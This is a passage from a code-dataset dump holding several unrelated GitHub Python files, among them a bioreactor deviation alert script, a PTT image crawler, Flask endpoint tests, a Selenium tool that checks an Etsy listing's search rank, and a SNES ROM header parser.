'float', 'Feed Pump [ml/hr]': 'float', 'Base Pump [mL/hr]': 'float',\n 'Antifoam Pump [mL/hr]': 'float'}\n data = pd.read_csv('dg1.csv', dtype=dtype, parse_dates=['Timestamp'], low_memory=False, na_filter=False)\n\n return data\n\n\ndef check_constants(data, setpoint, tolerance):\n \"\"\"\n Checks if all constant parameters (temp, airflow, and agitation) are within their tolerance range and if not,\n determines where the deviation first occurred.\n\n :param data: the recorded values of a parameter (temp, airflow, or agitation)\n :type data: a Pandas Series\n :param setpoint: the target value a parameter should be held\n :type setpoint: float\n :param tolerance: a numerical amount the parameter is allowed to deviate from the setpoint before it is accepted to\n be out of the operating range in order to accommodate equipment noise\n :type tolerance: float\n :return: Index where current deviation began occurring, otherwise None\n \"\"\"\n if abs(setpoint - data.iat[-1]) > tolerance:\n for idx in reversed(data.index):\n if abs(setpoint - data.iat[idx]) > tolerance:\n continue\n else:\n return idx + 1\n else:\n return None\n\n\ndef check_pumps(pump, data, setpoint, tolerance):\n \"\"\"\n Checks for one out of three different possible pump deviations each time this function is called. These deviations\n include how long a pump has been off, how long a pump has been on, and whether or not the pump flow rate is within\n the tolerance of the setpoint. The last recorded data value will always fall into one of these categories and is\n traced back to the index where sequence first began.\n\n :param pump: The header of a pump as it is written in the reactor's csv file\n :type pump: str\n :param data: the recorded values of a pump\n :type data: a Pandas Series\n :param setpoint: the target value a parameter should be held\n :type setpoint: float\n :param tolerance: a numerical amount the parameter is allowed to deviate from the setpoint before it is accepted to\n be out of the operating range in order to accommodate equipment noise\n :type tolerance: float\n :return: index of the Pandas Series where the current sequence began and the number of minutes the current sequence\n is allowed to persist\n :rtype: tuple containing two ints\n \"\"\"\n global rpm\n pump_specs = {'Base Pump [mL/hr]': {'on': 5, 'off': 310}, 'Feed Pump [ml/hr]': {'on': 50, 'off': 310},\n 'Antifoam Pump [mL/hr]': {'on': 20, 'off': 180}}\n\n if data.iat[-1] == 0: # checks how long a pump has been inactive\n for idx in reversed(data.index):\n if data.iat[idx] == 0:\n if idx == 0:\n return idx, 660\n continue\n else:\n if rpm == 1000:\n return idx + 1, 660\n elif rpm == 1500:\n return idx + 1, pump_specs[pump]['off']\n\n else:\n if abs(setpoint - data.iat[-1]) > tolerance: # checks how long a pump has been out of the tolerance range\n for idx in reversed(data.index):\n if abs(setpoint - data.iat[idx]) > tolerance and data.iat[idx] != 0:\n if idx == 0:\n return idx, 5\n continue\n else:\n return idx + 1, 5\n\n else: # check how long a pump has been running\n for idx in reversed(data.index):\n if data.iat[idx] != 0:\n if idx == 0:\n return idx, pump_specs[pump]['on']\n continue\n else:\n return idx + 1, pump_specs[pump]['on']\n\n\ndef agitation(data):\n \"\"\"\n Checks the reactor's csv file to see if the agitation ramped up to 1500. Under normal operating conditions, the rpm\n would jump from 1000 to 1500 when the feed is first triggered. This function cannot mistake any agitation deviations\n for an rpm ramp and should not be called once it has already detected an rpm ramp. Since the setpoint of an\n agitation ramp increases instantly, this function must be called every time a new row of data is logged to the\n reactor's csv file or else this function will miss the agitation jump.\n\n :param data: the recorded values of the motor\n :type data: a Pandas Series\n :return: True if an agitation jump is detected, False otherwise\n \"\"\"\n if abs(data.iat[-1] - 1500) < 10:\n if abs(data.iat[-2] - data.iat[-1]) > 50:\n return True\n return False\n\n\ndef check_pH(data, max_ph, min_ph=7.195):\n \"\"\"\n Checks the pH of the reactor and makes sure its within the allowed range of the pH (pH will rise during a\n starvation).\n\n :param data: the recorded values of the reactor's pH\n :type data: a Pandas Series\n :param max_ph: the highest pH value allowed in order to accommodate feed spikes\n :type max_ph: float\n :param min_ph: the lowest pH value allowed, which should never fall far from the set point of 7.20\n :type min_ph: float\n :return: Index of the Pandas Series where the deviation first began, otherwise if no deviation is found, None\n \"\"\"\n if data.iat[-1] < min_ph:\n for idx in reversed(data.index):\n if data.iat[idx] < min_ph:\n continue\n else:\n return idx + 1\n elif data.iat[-1] > max_ph:\n for idx in reversed(data.index):\n if data.iat[idx] > max_ph:\n continue\n else:\n return idx + 1\n else:\n return None\n\n\ndef check_time(timestamps, index, minutes=5):\n \"\"\"\n This function is used to check the length of time a parameter has been running at its current conditions and whether\n or not it has exceeded the amount of time it is allowed to run at these conditions. In the case of pH, temperature,\n airflow, and agitation, this function is only called when a known deviation from the set point is occurring. In the\n case of pumps, this will check the amount of time a pump has been at it's current operating conditions (on, off, or\n out of tolerance) and determine if it exceeds the amount of time it should be running at this condition. The default\n maximum amount of time to tolerate a deviation is 5 minutes for all parameters other than pumps. Pumps have \n different runtime tolerances depending on the type of pump and the current operating state it is in so the minutes \n argument should always be given when used for a pump.\n\n :param timestamps: The reactor's recorded datetime.datetime objects in the format of '%Y-%m-%d %H:%M:%S.%f'\n :type timestamps: a Panda Series\n :param index: the index where the deviation was first found\n :type index: int\n :param minutes: number of minutes a parameter is allowed to run in it's current operating state.\n :type minutes: int\n :return: True if the length of a deviation has exceeded the tolerance length, otherwise, False\n \"\"\"\n\n tolerance = datetime.timedelta(minutes=minutes)\n length = timestamps.iat[-1] - timestamps.iat[index]\n if length > tolerance:\n return True\n else:\n return False\n\n\ndef email_alert(param, time):\n \"\"\"\n Alerts the fermentation associate of the deviating parameter along with the start time of the deviation by email.\n :param param: the failing parameter written as it appears in the reactor's csv file\n :type param: str\n :param time: start time of the deviation\n :type time: datetime.datetime object in the format of '%Y-%m-%d %H:%M:%S.%f'\n :return: None\n \"\"\"\n associate_email = 'biosimulator@gmail.com'\n # login to SMTP server\n smtp_obj = smtplib.SMTP('smtp.gmail.com', 587)\n smtp_obj.ehlo()\n smtp_obj.starttls()\n smtp_obj.login(associate_email, os.environ.get('EMAIL_PASS'))\n msg = f'Deviation with {param} at {time}'\n smtp_obj.sendmail(associate_email, associate_email, 'Subject: Deviation Notifier\\n\\n' + msg)\n\n\ndef text_alert(param, time):\n \"\"\"\n Alerts the fermentation associate of the deviating parameter along with the start time of the deviation by text.\n Currently unused because the Twilio account is only on a trial version.\n :param param: the failing parameter\n :type param: str\n :param time: start time of the deviation\n :type time: datetime.datetime object in the format of '%Y-%m-%d %H:%M:%S.%f'\n :return: None\n \"\"\"\n associate_phone = os.environ.get('PHONE')\n client = Client(os.environ.get('TWILIO_SID'), os.environ.get('TWILIO_TOKEN'))\n message = client.messages.create(\n to=associate_phone,\n from_=\"+14154814546\", # Twilio phone number is expired\n body=f'Deviation with {param} at {time} ')\n\n\ndef check_deviations():\n \"\"\"\n This is the main function of this module and it splits the Pandas Dataframe into its individual Series and sends\n each Pandas Series and any necessary arguments to the corresponding helper function. If it is determined necessary\n to notify the fermentation associate, this calls email_alert and text_alert to do so.\n\n :return: None\n \"\"\"\n global rpm, notified\n # the setpoints of each parameter at index 0 along with the tolerated amount it is allowed to deviate\n setpoints = {'Agitation [rpm]': (rpm, 10), 'Airflow [mL/s]': (60, 3), 'Temp [C]': (32, 2),\n 'pH': (7.20, 0.2), 'Feed Pump [ml/hr]': (40, 3), 'Base Pump [mL/hr]': (35, 3),\n 'Antifoam Pump [mL/hr]': (1, 0.5)}\n data = read_csv()\n\n for label, content in data.iteritems():\n notify = None\n if label in setpoints.keys():\n deviation_idx = None\n setpoint, tolerance = setpoints[label]\n\n if rpm == 1000 and agitation(content):\n rpm = 1500\n\n # check temp, airflow and agitation\n if 'temp' in label.lower() or 'airflow' in label.lower() or 'agitation' in label.lower():\n deviation_idx = check_constants(content, setpoint, tolerance)\n\n # check pH\n elif 'ph' in label.lower():\n if rpm == 1500:\n deviation_idx = check_pH(content, max_ph=7.22)\n else:\n deviation_idx = check_pH(content, max_ph=7.27)\n\n if deviation_idx is not None or 'pump' in label.lower():\n # pumps must call check_time function every time new data is logged because there are 3 ways a pump can\n # deviate that have different time dependencies\n\n if 'pump' in label.lower():\n # print(f'{label} {check_pumps(label, content, setpoint, tolerance)}')\n deviation_idx, time_allowance = check_pumps(label, content, setpoint, tolerance)\n notify = check_time(data[\"Timestamp\"], deviation_idx, minutes=time_allowance)\n else:\n notify = check_time(data[\"Timestamp\"], deviation_idx)\n\n if notify and label not in notified.keys():\n notified[label] = 0\n # email_alert(label, data[\"Timestamp\"][deviation_idx]) # uncomment to send email alerts\n # text_alert(label, data[\"Timestamp\"][deviation_idx]) # uncomment to send text alerts\n print(f'{label} deviation at {data[\"Timestamp\"][deviation_idx]}')\n\n if label in notified.keys() and not notify:\n notified[label] += 1\n # if deviation doesn't occur again in the next 120 data logs (120 mins) it is counted as fixed\n # NOTE: does not have to be a consecutive 120 logs\n if notified[label] > 120:\n del notified[label]\n\n","repo_name":"Michaelli26/bioreactor-simulator","sub_path":"deviation_notifier.py","file_name":"deviation_notifier.py","file_ext":"py","file_size_in_byte":12175,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"10810226201","text":"import datetime\nimport sys\nfrom run_time import my_time\nfrom crawler import PttSpider, Download, ArticleInfo\n\n\n@my_time\ndef main():\n # python beauty_spider2.py [版名] [爬幾頁] [推文多少以上]\n # python beauty_spider2.py beauty 3 10\n board, page_term, push_rate, limit = sys.argv[1], int(\n sys.argv[2]), int(sys.argv[3]), int(sys.argv[4])\n # board, page_term, push_rate = 'beauty', 5, 20 # for debugger\n print('start crawler ptt {}...'.format(board))\n crawler_datetime = datetime.datetime.now()\n spider = PttSpider(board=board,\n parser_page=page_term,\n push_rate=push_rate)\n spider.run()\n datetime_format = '%Y%m%d%H%M%S'\n crawler_time = '{}_PttImg_{:{}}'.format(\n spider.board, crawler_datetime, datetime_format)\n info = ArticleInfo.data_process(spider.info, crawler_time)\n\n try:\n with open(\"urls.txt\", \"w\") as out_file:\n count = 0\n for img in info:\n count += 1\n if count > limit:\n break\n file_name = img[0].split('/')[-1]\n json = f'{{\"type\":\"pic\", \"name\":\"{file_name}\", \"msg\":\"{img[0]}\"}}\\n'\n out_file.write(json)\n except Exception as e:\n print(e)\n # download = Download(info)\n # download.run()\n print(\"下載完畢...\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"chengen1213/beauty_downloader","sub_path":"beauty_spider2.py","file_name":"beauty_spider2.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39644817803","text":"#!/usr/bin/env python3\n\nimport json\nimport os\nimport sys\nimport tempfile\nimport unittest\n\n_dir_ = os.path.dirname(os.path.realpath(__file__))\n_root_ = os.path.join(_dir_, '..', '..')\n\nsys.path.append(_root_)\n\nimport Application.statistics as _SAPI\nfrom Application.app import create_app\n\napp = create_app()\napp.config['TESTING'] = True\n\n# Hooks for every request\napp.before_request(_SAPI.pre_req)\napp.after_request(_SAPI.post_req)\n\n\nclass TestForumCreate(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.db_fd, app.config['DATABASE'] = tempfile.mkstemp()\n cls.client = app.test_client()\n\n @classmethod\n def tearDownClass(cls):\n os.close(cls.db_fd)\n os.unlink(app.config['DATABASE'])\n\n def test_api_create_endpoint(self):\n res = self.client.post(\"/web/forum/api/create\", data=json.dumps({}))\n self.assertEqual(res.status_code, 200)\n\n def test_api_create_post_endpoint(self):\n res = self.client.post(\"/web/forum/api/post\", data=json.dumps({}))\n self.assertEqual(res.status_code, 200)\n\n def test_api_latest_threads(self):\n res = self.client.get(\"/web/forum/api/latest\")\n self.assertEqual(res.status_code, 200)\n\n def test_forum_api_thread(self):\n res = self.client.get(\"/web/forum/api/thread/1\")\n self.assertEqual(res.status_code, 200),\n\n def test_statistics(self):\n res = self.client.get(\"/web/api/statistics\")\n self.assertEqual(res.status_code, 200),\n\n def test_user_statistics(self):\n res = self.client.get(\"/web/api/statistics/1\")\n self.assertEqual(res.status_code, 200),\n\n def test_metrics(self):\n res = self.client.get(\"/web/api/metrics\")\n self.assertEqual(res.status_code, 200),\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"CSE-Courses/course-project-a3-massive-muscles","sub_path":"test/backend/test_endpoints.py","file_name":"test_endpoints.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25171928980","text":"# ----------------------------------------\n# pyJSON Schema Loader and JSON Editor - Config Deployment Module\n# author: N. Plathe\n# ----------------------------------------\n\"\"\"\nThis Module deploys a small toy example schema and the config. It also contains smaller functions wrapping around saving the\nconfig or the index files.\n\"\"\"\n# ----------------------------------------\n# Music recommendation (albums):\n# Feuerschwanz - Memento Mori\n# Bullet for my Valentine - Bullet for my Valentine\n# ----------------------------------------\n# Libraries\n# ----------------------------------------\n\nimport json\nimport os\nimport logging\n\n# ----------------------------------------\n# Variables and Functions\n# ----------------------------------------\n\nlg = logging.getLogger(__name__)\nlg.setLevel(\"DEBUG\")\n\ndef deploy_schema(path):\n \"\"\"\n deploys the default example schema that is hardcoded here into a path\n\n Args:\n path: the path the schema shall be deployed to.\n\n Returns:\n bool: True, if deployment was successful, False otherwise.\n \"\"\"\n schema = '{\\\n\t \"$schema\": \"https://json-schema.org/draft/2020-12/schema\",\\\n\t \"$id\": \"https://inp-greifswald.de\",\\\n\t \"title\": \"Blank Schema\",\\\n\t \"description\": \"A default Schema for pyJSON. Get\\'s created by the tool on the fly.\",\\\n\t \"type\": \"object\",\\\n\t \"properties\": {\\\n\t\t \"general\": {\\\n\t\t\t \"title\": \"general\",\\\n\t\t\t \"description\": \"I\\'m just a blank test schema. Use me for testing and for trying out functions.\",\\\n\t\t\t \"type\": \"string\"\\\n\t\t },\\\n\t\t \"hierarch\":{\\\n\t\t\t \"title\": \"hierarch\",\\\n\t\t\t \"description\": \"Anchor for the rest.\",\\\n\t\t\t \"type\": \"object\",\\\n \t\t\t\"properties\": {\\\n\t \t\t\t\"Stage 1\":{\\\n\t\t \t\t\t\"title\": \"Stage 1\",\\\n\t\t\t \t\t\"description\": \"Open a Schema from your hard drive and add it to the schema storage. Then select it via the selector.\",\\\n\t\t\t\t \t\"type\": \"string\"\\\n \t\t\t\t},\\\n \t\t\t\t\"Stage 2\":{\\\n\t \t\t\t\t\"title\": \"Stage 2\",\\\n\t\t \t\t\t\"description\": \"You can generate a blank JSON from a schema, load a default for a selected schema or open a JSON and validate it.\",\\\n\t\t\t \t\t\"type\": \"string\"\\\n\t\t\t \t},\\\n \t\t\t\"Example_Number\":{\\\n \t \t\t\t\"title\": \"Example Number/Float Value\",\\\n \t\t \t\t\"description\": \"I am an example Floating Point Number, test the input validation with me.\",\\\n \t\t\t \t\"type\": \"number\"\\\n \t\t\t },\\\n \"Example_Int\":{\\\n \"title\": \"Example Integer Value\",\\\n \"description\": \"I am an example integer, test the input validation with me.\",\\\n \"type\": \"integer\"\\\n }\\\n\t\t\t }\\\n\t\t }\\\n\t }\\\n }'\n try:\n with open(os.path.join(path, \"default.json\"), \"w\", encoding='utf8') as out:\n json.dump(json.loads(schema), out, indent=4, ensure_ascii=False)\n lg.info(\"[deploy_files.deploy_schema/INFO]: Deployed default schema.\")\n except OSError as err:\n lg.error(\"[deploy_files.deploy_schema/ERROR]: Could not write file to directory!\")\n lg.debug(err)\n return False\n return True\n\n\n# main config\n\ndef deploy_config(path):\n \"\"\"\n deploys the config file, which retains last used file, schema and directory\n\n Args:\n path (str): the path, in which the config shall be deployed\n \"\"\"\n config = {\n \"last_dir\": os.getcwd(),\n \"last_schema\": \"default.json\",\n \"last_JSON\": None,\n \"verbose_logging\": False,\n \"show_error_representation\": True\n }\n try:\n with open(os.path.join(path, \"pyJSON_conf.json\"), \"w\", encoding = 'utf8') as out:\n json.dump(config, out, indent = 4, ensure_ascii = False)\n lg.info(\"[deploy_files.deploy_config/INFO]: Deployed config.\")\n except OSError as err:\n lg.error(\"[deploy_files.deploy_config/ERROR]: Could not set default config.\")\n lg.debug(err)\n\n\ndef save_config(path, config):\n \"\"\"\n Writes the config to the harddrive\n\n Args:\n path (str): the path, in which the config shall be saved or overwritten\n config (dict): the config dictionary\n \"\"\"\n try:\n with open(os.path.join(path, \"pyJSON_conf.json\"), \"w\", encoding = 'utf8') as out:\n json.dump(config, out, indent = 4, ensure_ascii = False)\n except OSError as err:\n lg.error(\"[deploy_files.save_config/ERROR]: Could not save config.\")\n lg.debug(err)\n\n\n# indexes\ndef save_main_index(path, index_dict):\n \"\"\"\n Writes the main index containing information about all indexed directories to the harddrive\n\n Args:\n path (str): the path, in which the main index shall be saved or overwritten\n index_dict (dict): the main index dictionary\n \"\"\"\n try:\n with open(os.path.join(path, \"Indexes/pyJSON_S_index.json\"), \"w\", encoding = 'utf8') as out:\n json.dump(index_dict, out, indent = 4, ensure_ascii = False)\n except OSError as err:\n lg.error(\"[deploy_files.saveMainIndex/ERROR]: Could not save config.\")\n\n\ndef save_index(path, index, count):\n \"\"\"\n Writes the index of a directory to the harddrive\n\n Args:\n path (str): the path the index shall be written or overwritten to\n index (list): the directory index as a list\n count (int): the current index number, since the indexes are numbered\n \"\"\"\n index_d = {\"files\": index}\n try:\n with open(os.path.join(path, \"Indexes/index\" + str(count) + \".json\"), \"w\", encoding ='utf8') as out:\n json.dump(index_d, out, indent = 4, ensure_ascii = False)\n except OSError as err:\n lg.error(\"[deploy_files.saveIndex/ERROR]: Could not save index for \" + path + \".\")\n\n\n# ----------------------------------------\n# Execution\n# ----------------------------------------\n\nif __name__ == \"__main__\":\n lg.info(\"Please don't run me directly, I just provide some files and functions.\")\n lg.info(\"Deploying files in the current working directory.\")\n deploy_config(os.getcwd())\n","repo_name":"nplathe/pyJSON-Schema-Loader-and-JSON-Editor","sub_path":"Modules/deploy_files.py","file_name":"deploy_files.py","file_ext":"py","file_size_in_byte":5978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"5152386764","text":"import torch\nimport torch.nn as nn\n\nclass FusionLayer(nn.Module):\n\n def __init__(self, config):\n super(FusionLayer, self).__init__()\n\n self.config = config\n self.attn = SelfAtt(config['id_emb_size'], config['num_heads'])\n\n \n def forward(self, ui_features):\n out = self.attn(ui_features[0], ui_features[1])\n s_u_out, s_i_out = torch.split(out, out.size(1)//2, 1)\n\n u_out = ui_features[0] + s_u_out\n i_out = ui_features[1] + s_i_out\n\n u_out = u_out.reshape(u_out.size(0), -1)\n i_out = i_out.reshape(u_out.size(0), -1)\n\n out = torch.cat([u_out, i_out], 1)\n\n return out\n\n\n\nclass SelfAtt(nn.Module):\n '''\n self attention for interaction\n '''\n def __init__(self, dim, num_heads):\n super(SelfAtt, self).__init__()\n self.encoder_layer = nn.TransformerEncoderLayer(dim, num_heads, 128, 0.4)\n self.encoder = nn.TransformerEncoder(self.encoder_layer, 1)\n\n def forward(self, user_fea, item_fea):\n fea = torch.cat([user_fea, item_fea], 1).permute(1, 0, 2) # batch * 6 * 64\n out = self.encoder(fea)\n return out.permute(1, 0, 2)","repo_name":"guibitten03/WebMedia-Challange-","sub_path":"framework/fusion.py","file_name":"fusion.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35838696268","text":"from django.db import migrations, models\nimport django.db.models.deletion\nfrom tuli import settings\n\nfrom tuli.models import image_file_upload\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Image',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('lookup', models.CharField(db_index=True, max_length=48)),\n ],\n ),\n migrations.CreateModel(\n name='ImageFile',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('image', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tuli.Image')),\n ('file', models.ImageField(upload_to=image_file_upload, height_field=\"height\", width_field=\"width\")),\n ('height', models.PositiveSmallIntegerField()),\n ('width', models.PositiveSmallIntegerField()),\n ],\n options={\n 'get_latest_by': ('image', '-width', '-height'),\n },\n ),\n ]\n","repo_name":"vdamewood/tuli","sub_path":"migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70431811352","text":"#!/usr/bin/env python\n\n# This code explains the usage of variables in python.\n# that is how to assign variables in different ways\n\n# Single assignment\ncounter = 100 # An integer assignment\nmiles = 1000.0 # A floating point\nname = \"John\" # A string\n\n# Multiple Assignments\n# the below code will assign the value 1 to a,b,c\n# simultaneously\na = b = c = 1\n\n# we can also assign multiple variables different\n# values simultaneously\na, b, c = 1, 2, \"john\"\n\n# Number data types store numeric values. They are immutable\n# data types, which means that changing the value of a number\n# data type results in a newly allocated object.\n# to delete the reference to a number object we can use the del statement\nvar = 0\ndel var\n\n# To see the exact memory where the variable is stored we can use the id()\n# or use the __repr__ function\nid(counter)\n# to see the hex value use hex() to convert to hex\nhex(id(counter))\n# alternate method to see the memory\ncounter.__repr__\n","repo_name":"kansi/Trail_Python","sub_path":"basic/p001_variables.py","file_name":"p001_variables.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"69958358873","text":"from flask import Flask, render_template, request, jsonify, json, session\nfrom datetime import datetime\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver import Keys\n\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom chromedriver_py import binary_path # this will get you the path variable\n\nfrom waitress import serve\nimport json\nimport pymongo\n\ndef selenium_method(id_element, search_text, limit=None, proxy=None):\n # s = Service('./chromedriver/chromedriver')\n s = Service(executable_path=binary_path)\n url_ws = \"https://www.etsy.com/\"\n options = Options()\n if proxy is not None: options.add_argument(f'--proxy-server={proxy}')\n options.add_experimental_option('detach', True)\n driver = webdriver.Chrome(service=s, options=options)\n a = ActionChains(driver)\n # params\n driver.get(url_ws)\n driver.maximize_window()\n #\n input_search = driver.find_element(By.XPATH, \"//input[@data-id='search-query']\")\n input_search.send_keys(search_text)\n\n search = driver.find_element(By.XPATH, \"//button[@data-id='gnav-search-submit-button']\")\n search.click()\n result = None\n try:\n while True:\n time.sleep(3)\n # pagination = driver.find_elements(By.XPATH, '//span[@class=\"screen-reader-only\"]')\n pagination = driver.find_elements(By.XPATH, \"//li[@class='wt-action-group__item-container']\")\n last_pagination = pagination[-2].text\n if last_pagination.isdigit():\n last_pagination = int(last_pagination)\n prev_last_pagination = pagination[-3].text\n print(f'page len:\\t{len(pagination)} | last: {last_pagination}')\n items = driver.find_elements(By.XPATH, \"//div[@class='wt-height-full']\")\n items = list(filter(lambda fit: json.loads(str(fit.get_attribute('data-appears-batch-options')))['total_items'] > 16, items))\n # Ad by Etsy seller\n\n item_title_list = list(map(lambda fit: {\n 'title': str(fit.find_element(By.TAG_NAME, \"a\").get_attribute('title')),\n 'element': fit,\n 'data-listing-id': str(fit.find_element(By.TAG_NAME, \"a\").get_attribute('data-listing-id'))\n }, items))\n current_page = str(driver.current_url).split(\"page=\")\n current_page = 1 if len(current_page) <= 1 else int(current_page[1])\n item_title_list = list(filter(lambda f: f['data-listing-id'] == id_element, item_title_list))\n result_count = len(item_title_list)\n print(f'\\n--------------\\n\\ncurrent_page: {current_page}\\nresult_count: {result_count}\\nlast_pagination: {last_pagination}')\n if result_count > 0 and last_pagination != int(current_page):\n print('YEAH!! I found it!!')\n element = item_title_list[0]\n element['element'].click()\n driver.switch_to.window(driver.window_handles[1])\n time.sleep(2)\n screen_shoot = driver.get_screenshot_as_base64()\n result = {\n 'list_id': id_element,\n 'title': element['title'],\n 'search_text': search_text,\n 'screenshot': screen_shoot,\n 'found_page': current_page,\n 'date': datetime.now().isoformat()\n }\n print(result)\n break\n elif result_count == 0 and last_pagination != int(current_page):\n print(f'!!!!!Came here!!!!!\\n{last_pagination}!={current_page}')\n next_button = driver.find_elements(By.XPATH, '//a[@class=\"wt-btn wt-btn--filled wt-action-group__item wt-btn--small wt-btn--icon\"]')\n print(next_button[-1].text)\n next_button[-1].click()\n elif result_count == 0 and last_pagination == int(current_page):\n print(\"end 1\")\n break\n\n if limit is not None and int(current_page) >= int(limit):\n break\n except:\n result = None\n driver.quit()\n return result\n","repo_name":"vagifahmadov/estyBot","sub_path":"helper/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27985757837","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\n\nimport hexview\n\n# My two main sources for this are:\n# https://en.wikibooks.org/wiki/Super_NES_Programming/SNES_memory_map\n# http://www.emulatronia.com/doctec/consolas/snes/sneskart.html#embededcartridge\n\n\nclass Header(object):\n\n HEADER_SIZE = int('20', 16) # 64 byte header\n LOROM_HEADER = int('7FC0', 16) # Lowrom bank ends at 7FFF, with no smc header\n HIROM_HEADER = int('FFC0', 16) # hirom bank ends at FFFF, with no smc header\n\n ROM_TYPES = {0: 'ROM',\n 1: 'ROM and RAM',\n 2: 'ROM and Save RAM',\n 3: 'ROM and DSP1 chip',\n 4: 'ROM, RAM, and DSP1 Chip',\n 5: 'ROM, Save RAM and DSP1 Chip',\n 19: 'ROM and Super FX chip',\n 227: 'ROM, RAM and GameBoy data',\n 246: 'ROM and DSP2 chip'}\n\n COUNTRY_TABLE = {0: 'Japan',\n 1: 'USA',\n 2: 'Australia, Europe, Oceania, and Asia ',\n 3: 'Sweden',\n 4: 'Finland',\n 5: 'Denmark',\n 6: 'France',\n 7: 'Holland',\n 8: 'Spain',\n 9: 'Germany, Austria, and Switzerland',\n 10: 'Italy',\n 11: 'Hong Kong and China',\n 12: 'Indonesia',\n 13: 'Korea'}\n\n LICENSEES = {1: 'Nintendo', 3: 'Imagineer-Zoom', 5: 'Zamuse', 6: 'Falcom', 8: 'Capcom', 9: 'HOT-B',\n 10: 'Jaleco', 11: 'Coconuts', 12: 'Rage Software', 14: 'Technos', 15: 'Mebio Software',\n 18: 'Gremlin Graphics', 19: 'Electronic Arts', 21: 'COBRA Team', 22: 'Human/Field',\n 23: 'KOEI', 24: 'Hudson Soft', 26: 'Yanoman', 28: 'Tecmo', 30: 'Open System',\n 31: 'Virgin Games', 32: 'KSS', 33: 'Sunsoft', 34: 'POW', 35: 'Micro World',\n 38: 'Enix', 39: 'Loriciel/Electro Brain', 40: 'Kemco', 41: 'Seta Co.,Ltd.',\n 45: 'Visit Co.,Ltd.', 49: 'Carrozzeria', 50: 'Dynamic', 51: 'Nintendo', 52: 'Magifact',\n 53: 'Hect', 60: 'Empire Software', 61: 'Loriciel', 64: 'Seika Corp.', 65: 'UBI Soft',\n 70: 'System 3', 71: 'Spectrum Holobyte', 73: 'Irem', 75: 'Raya Systems/Sculptured Software',\n 76: 'Renovation Products', 77: 'Malibu Games/Black Pearl', 79: 'U.S. Gold',\n 80: 'Absolute Entertainment', 81: 'Acclaim', 82: 'Activision', 83: 'American Sammy',\n 84: 'GameTek', 85: 'Hi Tech Expressions', 86: 'LJN Toys', 90: 'Mindscape', 93: 'Tradewest',\n 95: 'American Softworks Corp.', 96: 'Titus', 97: 'Virgin Interactive Entertainment',\n 98: 'Maxis', 103: 'Ocean', 105: 'Electronic Arts', 107: 'Laser Beam', 110: 'Elite',\n 111: 'Electro Brain', 112: 'Infogrames', 113: 'Interplay', 114: 'LucasArts',\n 115: 'Parker Brothers', 117: 'STORM', 120: 'THQ Software', 121: 'Accolade Inc.',\n 122: 'Triffix Entertainment', 124: 'Microprose', 127: 'Kemco', 128: 'Misawa', 129: 'Teichio',\n 130: 'Namco Ltd.', 131: 'Lozc', 132: 'Koei', 134: 'Tokuma Shoten Intermedia',\n 136: 'DATAM-Polystar', 139: 'Bullet-Proof Software', 140: 'Vic Tokai', 142: 'Character Soft',\n 143: 'I\\'Max', 144: 'Takara', 145: 'CHUN Soft', 146: 'Video System Co., Ltd.', 147: 'BEC',\n 149: 'Varie', 151: 'Kaneco', 153: 'Pack in Video', 154: 'Nichibutsu', 155: 'TECMO',\n 156: 'Imagineer Co.', 160: 'Telenet', 164: 'Konami', 165: 'K.Amusement Leasing Co.',\n 167: 'Takara', 169: 'Technos Jap.', 170: 'JVC', 172: 'Toei Animation', 173: 'Toho',\n 175: 'Namco Ltd.', 177: 'ASCII Co. Activison', 178: 'BanDai America', 180: 'Enix',\n 182: 'Halken', 186: 'Culture Brain', 187: 'Sunsoft', 188: 'Toshiba EMI',\n 189: 'Sony Imagesoft', 191: 'Sammy', 192: 'Taito', 194: 'Kemco', 195: 'Square',\n 196: 'Tokuma Soft', 197: 'Data East', 198: 'Tonkin House', 200: 'KOEI', 202: 'Konami USA',\n 203: 'NTVIC', 205: 'Meldac', 206: 'Pony Canyon', 207: 'Sotsu Agency/Sunrise',\n 208: 'Disco/Taito', 209: 'Sofel', 210: 'Quest Corp.', 211: 'Sigma', 214: 'Naxat',\n 216: 'Capcom Co., Ltd.', 217: 'Banpresto', 218: 'Tomy', 219: 'Acclaim', 221: 'NCS',\n 222: 'Human Entertainment', 223: 'Altron', 224: 'Jaleco', 226: 'Yutaka', 228: 'T&ESoft',\n 229: 'EPOCH Co.,Ltd.', 231: 'Athena', 232: 'Asmik', 233: 'Natsume', 234: 'King Records',\n 235: 'Atlus', 236: 'Sony Music Entertainment', 238: 'IGS', 241: 'Motown Software',\n 242: 'Left Field Entertainment', 243: 'Beam Software', 244: 'Tec Magik', 249: 'Cybersoft',\n 255: 'Hudson Soft'}\n\n def __init__(self, filename):\n self.filename = filename\n 